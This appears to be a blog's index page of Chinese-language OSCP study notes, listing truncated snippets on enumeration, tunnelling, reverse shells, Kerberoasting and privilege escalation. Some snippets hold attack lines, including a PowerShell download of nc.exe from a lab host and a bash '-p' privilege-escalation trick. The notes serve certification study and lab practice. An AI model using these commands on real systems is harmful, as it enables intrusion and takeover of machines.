【OSCP】課程筆記
OSCP 筆記
起手式 scan ip port service 列舉 版本 : CVE 設定 狀態 initial access interactive shell P...
Google haking
這個 Google 搜尋用法是用來尋找網頁伺服器上可能包含檔案目錄索引的特定檔案或資料夾的索引頁面。該搜尋字符串的組成部分如下: intitle:"index of": 這部分指示 G...
【Tunnel】Port forwarding and Tunneling
Port forwarding socat : 課本18.2 範例 rinetd:它更適合長期的端口轉發配置,但對於臨時端口轉發解決方案來說可能稍微不夠靈活。 Netcat + 命名管道文...
【Tip】關於 bash
【Tip】無痕模式 bash script -c /bin/bash -q /dev/null 這個指令使用了 `script` 工具,該工具通常用於記錄終端會話。下面是詳細解釋: ...
【kali】未安裝工具
rockyou(seclists) /usr/share/seclists # 安裝 sudo apt update sudo apt install -y seclists cd...
OSCP Recipe 2023
OSCP Recipe 2023 Date: 20230921 ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking...
常用目錄/檔案
除了 rwx 文件權限外,還有兩個與可執行文件相關的額外特殊權利:setuid 和 setgid。這些用字母 "s" 來表示。 如果這兩個權限被設置,權限中將出現大寫或小寫的 "s"。這允許當...
【php】php攻擊手法
php 漏洞網頁 index.php <a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a...
【反向 shell】
https://gchq.github.io/CyberChef https://www.online-python.com/ Online - Reverse Shell Generato...
【Linux】【列舉】常用命令
# 尋找當前用戶可寫目錄 oe@debian-privesc:~$ find / -writable -type d 2>/dev/null .. /home/joe /home/joe...
【Windows】【列舉】常用命令
powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe net user net u...
【kali】解析度設定
【kali】解析度設定 【1400 X 900】 【VirtualBox】【檢視】-> 【全螢幕模式】 【VirtualBox】【虛擬畫面1】-> 【縮放至200%】
【Windows】【提權】Get-ObjectAcl 搜尋自己可管理帳號
Get-NetUser 找到自己 sid # 方法一 PS C:\Tools> Get-NetUser -Identity stephanie logoncount ...
【Windows】登入方法
密碼 取得方法: 密碼噴灑 crackmapexe hash破解 # impacket-GetUserSPNs => Kerberoasting攻擊 取得hash # hashc...
【轉載】Emotet病毒惡意文件分析實例
https://www.uuu.com.tw/Public/content/article/21/20210308.htm 主要是想寫 cyberchef 組合用法,有空再整理
【Mac】未安裝軟體
mac install for ctfhttps://medium.com/@seitzmanuel/how-to-get-your-mac-osx-ready-for-playing-ctfs...
【Linux】【提權】相關指令
Sudo install # # ./bash -p => -p: 載入下環境變數 sudo install -m 755 $(which bash) . ./bash -p
包包的解題思路
既使走過的路,每當事情有了變化,都要重新檢視,說不定當初不可利用的服務,在某階段,可以再次利用 flag的截圖指令要正確喔 hostname && whoami && cat proof.t...